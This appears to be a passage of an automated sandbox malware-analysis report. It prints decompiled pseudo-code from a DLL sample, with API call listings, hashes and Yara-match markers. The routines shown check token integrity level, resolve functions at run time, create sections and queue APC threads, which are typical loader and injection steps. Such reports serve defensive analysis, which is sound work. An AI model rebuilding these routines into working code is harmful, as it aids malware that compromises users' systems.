                                                                                                                                                                                                                                    • Opcode ID: 52112aeba085ab16a49108d0796aec3c59e373d834422daf4e386dc77d05cd73
                                                                                                                                                                                                                                    • Instruction ID: 2fe08494c00899f4c8857ede7d7cf8cdbe9120863b6fbb5eb6ca1fed57eb5789
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 52112aeba085ab16a49108d0796aec3c59e373d834422daf4e386dc77d05cd73
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 74219676A40208BBEB21EFA8DC05F9B77AAAB48BD0F114162F719E7190E7709515CB50
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E02F9924F(long* _a4) {
                                                                                                                                                                                                                                    				long _v8;
                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                    				void _v16;
                                                                                                                                                                                                                                    				long _v20;
                                                                                                                                                                                                                                    				int _t33;
                                                                                                                                                                                                                                    				void* _t46;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_v16 = 1;
                                                                                                                                                                                                                                    				_v20 = 0x2000;
                                                                                                                                                                                                                                    				if( *0x2f9d25c > 5) {
                                                                                                                                                                                                                                    					_v16 = 0;
                                                                                                                                                                                                                                    					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
                                                                                                                                                                                                                                    						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
                                                                                                                                                                                                                                    						_v8 = 0;
                                                                                                                                                                                                                                    						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
                                                                                                                                                                                                                                    						if(_v8 != 0) {
                                                                                                                                                                                                                                    							_t46 = E02F92049(_v8);
                                                                                                                                                                                                                                    							if(_t46 != 0) {
                                                                                                                                                                                                                                    								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
                                                                                                                                                                                                                                    								if(_t33 != 0) {
                                                                                                                                                                                                                                    									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								E02F99039(_t46);
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						CloseHandle(_v12);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				 *_a4 = _v20;
                                                                                                                                                                                                                                    				return _v16;
                                                                                                                                                                                                                                    			}










                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 02F99281
                                                                                                                                                                                                                                    • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 02F992A1
                                                                                                                                                                                                                                    • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 02F992B1
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02F99301
                                                                                                                                                                                                                                      • Part of subcall function 02F92049: RtlAllocateHeap.NTDLL(00000000,00000000,02F97E50), ref: 02F92055
                                                                                                                                                                                                                                    • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 02F992D4
                                                                                                                                                                                                                                    • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 02F992DC
                                                                                                                                                                                                                                    • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 02F992EC
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1295030180-0
                                                                                                                                                                                                                                    • Opcode ID: b093de99779fcc43df8be2b6b8cf59a962672573db592d4f2b3d1bfb0c20e3f1
                                                                                                                                                                                                                                    • Instruction ID: 3ea36fb540448d36a8034d8bd189f3b97cc9ef49e700e2130c189c2d35c98878
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b093de99779fcc43df8be2b6b8cf59a962672573db592d4f2b3d1bfb0c20e3f1
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6B216D75D0020DFFEF00AFA1DC84DEEBB79EB48744F10006AEA11A61A0C7758A15EF60
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 02F91680
                                                                                                                                                                                                                                    • IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,?), ref: 02F91702
                                                                                                                                                                                                                                    • StrStrIW.SHLWAPI(?,006E0069), ref: 02F91741
                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 02F91763
                                                                                                                                                                                                                                      • Part of subcall function 02F952F9: SysAllocString.OLEAUT32(02F9C2B0), ref: 02F95349
                                                                                                                                                                                                                                    • SafeArrayDestroy.OLEAUT32(?), ref: 02F917B7
                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 02F917C5
                                                                                                                                                                                                                                      • Part of subcall function 02F92436: Sleep.KERNELBASE(000001F4), ref: 02F9247E
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2118684380-0
                                                                                                                                                                                                                                    • Opcode ID: 72faf788c4ca5e77da57a235fbf996a55f57583ebfb47dfc256bac7e77e460c2
                                                                                                                                                                                                                                    • Instruction ID: 82804302af95c4be01df12cfcc16cfd9088e7cfbfa911fa589217dbfdfe6420f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 72faf788c4ca5e77da57a235fbf996a55f57583ebfb47dfc256bac7e77e460c2
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7F510D76D0020AAFDF10DFA8C9848AEB7B6FF88784B158939E615EB210D731AD45CB51
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E00401A0F(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                    				_Unknown_base(*)()* _t29;
                                                                                                                                                                                                                                    				_Unknown_base(*)()* _t33;
                                                                                                                                                                                                                                    				_Unknown_base(*)()* _t36;
                                                                                                                                                                                                                                    				_Unknown_base(*)()* _t39;
                                                                                                                                                                                                                                    				_Unknown_base(*)()* _t42;
                                                                                                                                                                                                                                    				intOrPtr _t46;
                                                                                                                                                                                                                                    				struct HINSTANCE__* _t50;
                                                                                                                                                                                                                                    				intOrPtr _t56;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t56 = E00401DE1(0x20);
                                                                                                                                                                                                                                    				if(_t56 == 0) {
                                                                                                                                                                                                                                    					_v8 = 8;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_t50 = GetModuleHandleA( *0x404150 + 0x405014);
                                                                                                                                                                                                                                    					_v8 = 0x7f;
                                                                                                                                                                                                                                    					_t29 = GetProcAddress(_t50,  *0x404150 + 0x405151);
                                                                                                                                                                                                                                    					 *(_t56 + 0xc) = _t29;
                                                                                                                                                                                                                                    					if(_t29 == 0) {
                                                                                                                                                                                                                                    						L8:
                                                                                                                                                                                                                                    						E00401DFC(_t56);
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_t33 = GetProcAddress(_t50,  *0x404150 + 0x405161);
                                                                                                                                                                                                                                    						 *(_t56 + 0x10) = _t33;
                                                                                                                                                                                                                                    						if(_t33 == 0) {
                                                                                                                                                                                                                                    							goto L8;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_t36 = GetProcAddress(_t50,  *0x404150 + 0x405174);
                                                                                                                                                                                                                                    							 *(_t56 + 0x14) = _t36;
                                                                                                                                                                                                                                    							if(_t36 == 0) {
                                                                                                                                                                                                                                    								goto L8;
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								_t39 = GetProcAddress(_t50,  *0x404150 + 0x405189);
                                                                                                                                                                                                                                    								 *(_t56 + 0x18) = _t39;
                                                                                                                                                                                                                                    								if(_t39 == 0) {
                                                                                                                                                                                                                                    									goto L8;
                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                    									_t42 = GetProcAddress(_t50,  *0x404150 + 0x40519f);
                                                                                                                                                                                                                                    									 *(_t56 + 0x1c) = _t42;
                                                                                                                                                                                                                                    									if(_t42 == 0) {
                                                                                                                                                                                                                                    										goto L8;
                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                    										 *((intOrPtr*)(_t56 + 8)) = _a8;
                                                                                                                                                                                                                                    										 *((intOrPtr*)(_t56 + 4)) = _a4;
                                                                                                                                                                                                                                    										_t46 = E00401EB5(_t56, _a12); // executed
                                                                                                                                                                                                                                    										_v8 = _t46;
                                                                                                                                                                                                                                    										if(_t46 != 0) {
                                                                                                                                                                                                                                    											goto L8;
                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                    											 *_a16 = _t56;
                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _v8;
                                                                                                                                                                                                                                    			}













                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 00401DE1: HeapAlloc.KERNEL32(00000000,?,00401556,00000208,00000000,00000000,?,?,?,004016A9,?), ref: 00401DED
                                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00401E4D,?,?,?,?,?,00000002,?,00401401), ref: 00401A33
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00401A55
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00401A6B
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00401A81
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00401A97
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00401AAD
                                                                                                                                                                                                                                      • Part of subcall function 00401EB5: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,76D24EE0,00000000,00000000,?), ref: 00401F12
                                                                                                                                                                                                                                      • Part of subcall function 00401EB5: memset.NTDLL ref: 00401F34
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.512650162.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.512935351.0000000000405000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1632424568-0
                                                                                                                                                                                                                                    • Opcode ID: e65ed0cd1a0425a40dfe6a27f9fba2ccd83eda7beb229b0a6519b31ca7f91d5c
                                                                                                                                                                                                                                    • Instruction ID: a5b725abbf619f5b34b99e3f49f5d91652d314a6d7b06be396a476ddccf995a6
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e65ed0cd1a0425a40dfe6a27f9fba2ccd83eda7beb229b0a6519b31ca7f91d5c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E9211EB160160AAFD710DFA9DD88E6B7BECEF483447004476E905EB361D774E9018F68
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 325 401afa-401b0e 326 401b10-401b11 325->326 327 401b7f-401b8c InterlockedDecrement 325->327 328 401bcc-401bd3 326->328 330 401b17-401b24 InterlockedIncrement 326->330 327->328 329 401b8e-401b94 327->329 331 401bc0-401bc6 HeapDestroy 329->331 332 401b96 329->332 330->328 333 401b2a-401b3e HeapCreate 330->333 331->328 334 401b9b-401bab SleepEx 332->334 335 401b40-401b71 call 4015ee call 4012dc 333->335 336 401b7a-401b7d 333->336 337 401bb4-401bba CloseHandle 334->337 338 401bad-401bb2 334->338 335->328 343 401b73-401b76 335->343 336->328 337->331 338->334 338->337 343->336
                                                                                                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                                                                                                    			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                    				long _v8;
                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                    				void* __ebp;
                                                                                                                                                                                                                                    				char _t9;
                                                                                                                                                                                                                                    				void* _t10;
                                                                                                                                                                                                                                    				void* _t18;
                                                                                                                                                                                                                                    				void* _t23;
                                                                                                                                                                                                                                    				void* _t36;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                                                    				_t9 = _a8;
                                                                                                                                                                                                                                    				_v8 = 1;
                                                                                                                                                                                                                                    				if(_t9 == 0) {
                                                                                                                                                                                                                                    					_t10 = InterlockedDecrement(0x404108);
                                                                                                                                                                                                                                    					__eflags = _t10;
                                                                                                                                                                                                                                    					if(_t10 == 0) {
                                                                                                                                                                                                                                    						__eflags =  *0x40410c;
                                                                                                                                                                                                                                    						if( *0x40410c != 0) {
                                                                                                                                                                                                                                    							_t36 = 0x2328;
                                                                                                                                                                                                                                    							while(1) {
                                                                                                                                                                                                                                    								SleepEx(0x64, 1);
                                                                                                                                                                                                                                    								__eflags =  *0x404118;
                                                                                                                                                                                                                                    								if( *0x404118 == 0) {
                                                                                                                                                                                                                                    									break;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								_t36 = _t36 - 0x64;
                                                                                                                                                                                                                                    								__eflags = _t36;
                                                                                                                                                                                                                                    								if(_t36 > 0) {
                                                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								break;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							CloseHandle( *0x40410c);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						HeapDestroy( *0x404110);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					if(_t9 == 1 && InterlockedIncrement(0x404108) == 1) {
                                                                                                                                                                                                                                    						_t18 = HeapCreate(0, 0x400000, 0); // executed
                                                                                                                                                                                                                                    						_t41 = _t18;
                                                                                                                                                                                                                                    						 *0x404110 = _t18;
                                                                                                                                                                                                                                    						if(_t18 == 0) {
                                                                                                                                                                                                                                    							L6:
                                                                                                                                                                                                                                    							_v8 = 0;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							 *0x404130 = _a4;
                                                                                                                                                                                                                                    							asm("lock xadd [eax], edi");
                                                                                                                                                                                                                                    							_push( &_a8);
                                                                                                                                                                                                                                    							_t23 = E004012DC(E0040111A, E004015EE(_a12, 1, 0x404118, _t41));
                                                                                                                                                                                                                                    							 *0x40410c = _t23;
                                                                                                                                                                                                                                    							if(_t23 == 0) {
                                                                                                                                                                                                                                    								asm("lock xadd [esi], eax");
                                                                                                                                                                                                                                    								goto L6;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _v8;
                                                                                                                                                                                                                                    			}













                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(00404108), ref: 00401B1C
                                                                                                                                                                                                                                    • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 00401B31
                                                                                                                                                                                                                                      • Part of subcall function 004012DC: CreateThread.KERNEL32 ref: 004012F3
                                                                                                                                                                                                                                      • Part of subcall function 004012DC: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 00401308
                                                                                                                                                                                                                                      • Part of subcall function 004012DC: GetLastError.KERNEL32(00000000), ref: 00401313
                                                                                                                                                                                                                                      • Part of subcall function 004012DC: TerminateThread.KERNEL32(00000000,00000000), ref: 0040131D
                                                                                                                                                                                                                                      • Part of subcall function 004012DC: CloseHandle.KERNEL32(00000000), ref: 00401324
                                                                                                                                                                                                                                      • Part of subcall function 004012DC: SetLastError.KERNEL32(00000000), ref: 0040132D
                                                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(00404108), ref: 00401B84
                                                                                                                                                                                                                                    • SleepEx.KERNEL32(00000064,00000001), ref: 00401B9E
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32 ref: 00401BBA
                                                                                                                                                                                                                                    • HeapDestroy.KERNEL32 ref: 00401BC6
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.512650162.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.512935351.0000000000405000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2110400756-0
                                                                                                                                                                                                                                    • Opcode ID: 85dc79e01d7bf63c4f8ea18c305ee8395bb64e936cc71f747414f0cd9447c82b
                                                                                                                                                                                                                                    • Instruction ID: 792522c7080727e056b4609bb1b29018c808fce2ea1d8660a7d1a9546f28a125
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 85dc79e01d7bf63c4f8ea18c305ee8395bb64e936cc71f747414f0cd9447c82b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5421A4B1600205ABC7109F69ED89E1A7FB8F7A4351710413BF615F72F1E7789D408B58
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%


                                                                                                                                                                                                                                    C-Code - Quality: 74%
                                                                                                                                                                                                                                    			E02F96A56(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                                                    				struct _FILETIME _v12;
                                                                                                                                                                                                                                    				void* _t10;
                                                                                                                                                                                                                                    				void* _t12;
                                                                                                                                                                                                                                    				int _t14;
                                                                                                                                                                                                                                    				signed int _t16;
                                                                                                                                                                                                                                    				void* _t18;
                                                                                                                                                                                                                                    				signed int _t19;
                                                                                                                                                                                                                                    				unsigned int _t23;
                                                                                                                                                                                                                                    				void* _t26;
                                                                                                                                                                                                                                    				signed int _t33;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t26 = __edx;
                                                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                                                    				_t10 = HeapCreate(0, 0x400000, 0); // executed
                                                                                                                                                                                                                                    				 *0x2f9d238 = _t10;
                                                                                                                                                                                                                                    				if(_t10 != 0) {
                                                                                                                                                                                                                                    					 *0x2f9d1a8 = GetTickCount();
                                                                                                                                                                                                                                    					_t12 = E02F98F10(_a4);
                                                                                                                                                                                                                                    					if(_t12 == 0) {
                                                                                                                                                                                                                                    						do {
                                                                                                                                                                                                                                    							GetSystemTimeAsFileTime( &_v12);
                                                                                                                                                                                                                                    							_t14 = SwitchToThread();
                                                                                                                                                                                                                                    							_t23 = _v12.dwHighDateTime;
                                                                                                                                                                                                                                    							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 7;
                                                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                                                    							_push(9);
                                                                                                                                                                                                                                    							_push(_t23 >> 7);
                                                                                                                                                                                                                                    							_push(_t16);
                                                                                                                                                                                                                                    							L02F9B226();
                                                                                                                                                                                                                                    							_t33 = _t14 + _t16;
                                                                                                                                                                                                                                    							_t18 = E02F97E03(_a4, _t33);
                                                                                                                                                                                                                                    							_t19 = 2;
                                                                                                                                                                                                                                    							_t25 = _t33;
                                                                                                                                                                                                                                    							Sleep(_t19 << _t33); // executed
                                                                                                                                                                                                                                    						} while (_t18 == 1);
                                                                                                                                                                                                                                    						if(E02F96B96(_t25) != 0) {
                                                                                                                                                                                                                                    							 *0x2f9d260 = 1; // executed
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t12 = E02F9225B(_t26); // executed
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_t12 = 8;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _t12;
                                                                                                                                                                                                                                    			}














                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,02F9807D,?), ref: 02F96A69
                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 02F96A7D
                                                                                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,02F9807D,?), ref: 02F96A99
                                                                                                                                                                                                                                    • SwitchToThread.KERNEL32(?,00000001,?,?,?,02F9807D,?), ref: 02F96A9F
                                                                                                                                                                                                                                    • _aullrem.NTDLL(?,?,00000009,00000000), ref: 02F96ABC
                                                                                                                                                                                                                                    • Sleep.KERNELBASE(00000002,00000000,?,00000001,?,?,?,02F9807D,?), ref: 02F96AD6
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 507476733-0
                                                                                                                                                                                                                                    • Opcode ID: 233d44269341231af217f00f0cdae82235f1f4c230651697649f72d12fdfae56
                                                                                                                                                                                                                                    • Instruction ID: 29a9487f26ce71934ffb2fdf862bc62651393d81300d17f44b23610b51dec26c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 233d44269341231af217f00f0cdae82235f1f4c230651697649f72d12fdfae56
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E711A572E842047FFB24AB75EC09B5ABB9DDB48BD0F10492AFB05D6190EBB0D4508B61
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    control_flow_graph 359 4012dc-4012fd CreateThread 360 401334-401337 359->360 361 4012ff-401310 QueueUserAPC 359->361 361->360 362 401312-401333 GetLastError TerminateThread CloseHandle SetLastError 361->362 362->360
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E004012DC(long _a4, DWORD* _a12) {
                                                                                                                                                                                                                                    				_Unknown_base(*)()* _v0;
                                                                                                                                                                                                                                    				void* _t4;
                                                                                                                                                                                                                                    				long _t6;
                                                                                                                                                                                                                                    				long _t11;
                                                                                                                                                                                                                                    				void* _t13;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x40414c, 0, _a12); // executed
                                                                                                                                                                                                                                    				_t13 = _t4;
                                                                                                                                                                                                                                    				if(_t13 != 0) {
                                                                                                                                                                                                                                    					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
                                                                                                                                                                                                                                    					if(_t6 == 0) {
                                                                                                                                                                                                                                    						_t11 = GetLastError();
                                                                                                                                                                                                                                    						TerminateThread(_t13, _t11);
                                                                                                                                                                                                                                    						CloseHandle(_t13);
                                                                                                                                                                                                                                    						_t13 = 0;
                                                                                                                                                                                                                                    						SetLastError(_t11);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _t13;
                                                                                                                                                                                                                                    			}









                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CreateThread.KERNEL32 ref: 004012F3
                                                                                                                                                                                                                                    • QueueUserAPC.KERNELBASE(?,00000000,?), ref: 00401308
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 00401313
                                                                                                                                                                                                                                    • TerminateThread.KERNEL32(00000000,00000000), ref: 0040131D
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00401324
                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 0040132D
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.512650162.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.512935351.0000000000405000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3832013932-0
                                                                                                                                                                                                                                    • Opcode ID: cd0faf53fd1fb904e4ab0bbb06b9567a901d65b3bce5edb2fc0928527926f53e
                                                                                                                                                                                                                                    • Instruction ID: f5107841804292b3b09bf02656a39ff33859dc1d0ce8cd21f452a75bd9d4c98c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cd0faf53fd1fb904e4ab0bbb06b9567a901d65b3bce5edb2fc0928527926f53e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 68F05E32502220FBE6115FA0AD08F9FBF6CFB08712F004425FA01B1164C7348A008BAD
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 57%
                                                                                                                                                                                                                                    			E02F9225B(signed int __edx) {
                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                    				long _v12;
                                                                                                                                                                                                                                    				CHAR* _v16;
                                                                                                                                                                                                                                    				long _v20;
